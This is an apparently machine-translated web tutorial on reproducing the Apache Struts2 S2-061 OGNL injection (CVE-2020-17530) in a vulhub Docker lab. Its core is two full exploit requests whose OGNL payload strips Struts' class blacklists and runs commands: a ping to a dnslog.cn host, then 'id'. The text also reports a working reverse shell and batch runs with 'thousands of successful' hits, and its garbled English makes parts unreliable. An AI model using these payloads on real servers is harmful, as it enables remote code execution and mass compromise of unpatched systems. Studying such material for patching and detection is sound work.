How to reproduce Struts2 S2-061 remote command execution vulnerability CVE-2020-17530 01/19 Update SLTechnology News&Howtos

How to reproduce Struts2 S2-061 remote command execution vulnerability CVE-2020-17530

2025-01-19 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

How to reproduce Struts2 S2-061remote command execution vulnerability CVE-2020-17530, I believe many inexperienced people don't know what to do about it. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Recurrence of remote Command execution vulnerability in Struts2 S2-061

I. brief introduction of loopholes

Apache Struts2 framework is a Web framework for developing Java EE network applications. Apache Struts disclosed the S2-061 Struts remote code execution vulnerability (CVE-2020-17530) on December 8, 2020. There may be OGNL expression injection vulnerabilities in situations such as the use of some tag, resulting in remote code execution with great risk.

Second, influence the version

Apache Struts 2.0.0-2.5.25

III. Recurrence of loopholes

Docker environment address:

Project address:

Https://github.com/vulhub/vulhub/tree/master/struts2/s2-061

Pull the image startup environment:

Docker-compose up-d

Access destination address:

Http://192.168.1.107:8080/

Perform DNSlog authentication vulnerabilities:

POST/index.actionHTTP/1.1Host: 192.168.1.107:8080Accept-Encoding: gzip, deflateAccept: * / * Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Length: 846-WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Disposition: form-data Name= "id"% {(# instancemanager=#application ["org.apache.tomcat.InstanceManager"]). (# stack=#attr ["com.opensymphony.xwork2.util.ValueStack.ValueStack"]). (# bean=#instancemanager.newInstance ("org.apache.commons.collections.BeanMap")). (# bean.setBean (# stack)). (# context=#bean.get ("context")). (# bean.setBean (# context)). (# macc=#bean.get ("memberAccess")) Bean.setBean (# macc). (# emptyset=#instancemanager.newInstance ("java.util.HashSet")). (# bean.put ("excludedClasses") # emptyset)). (# bean.put ("excludedPackageNames", # emptyset)). (# arglist=#instancemanager.newInstance ("java.util.ArrayList")). (# arglist.add ("ping p0fai2.dnslog.cn")). (# execute=#instancemanager.newInstance ("freemarker.template.utility.Execute")). (# execute.exec (# arglist))}-WebKitFormBoundaryl7d1B1aGsV2wcZwF--

DNGlog record

Access grab package, execute exp command, execute id

POST/index.actionHTTP/1.1Host: 192.168.1.107:8080Accept-Encoding: gzip, deflateAccept: * / * Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Length: 827-WebKitFormBoundaryl7d1B1aGsV2wcZwFContent-Disposition: form-data Name= "id"% {(# instancemanager=#application ["org.apache.tomcat.InstanceManager"]). (# stack=#attr ["com.opensymphony.xwork2.util.ValueStack.ValueStack"]). (# bean=#instancemanager.newInstance ("org.apache.commons.collections.BeanMap")). (# bean.setBean (# stack)). (# context=#bean.get ("context")). (# bean.setBean (# context)). (# macc=#bean.get ("memberAccess")) Bean.setBean (# macc). (# emptyset=#instancemanager.newInstance ("java.util.HashSet")). (# bean.put ("excludedClasses") # emptyset)). (# bean.put ("excludedPackageNames", # emptyset)). (# arglist=#instancemanager.newInstance ("java.util.ArrayList")). (# arglist.add ("id")). (# execute=#instancemanager.newInstance ("freemarker.template.utility.Execute")). (# execute.exec (# arglist))}-WebKitFormBoundaryl7d1B1aGsV2wcZwF--

Simple python script verification execution:

You can also successfully perform a rebound shell to get:

Run thousands of successful ones in batches: (maybe the default index has the wrong path) and study it later.

IV. Safety recommendations

Upgrade the Apache Struts framework to the latest version.

After reading the above, do you know how to reproduce the Struts2 S2-061 remote command execution vulnerability CVE-2020-17530? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.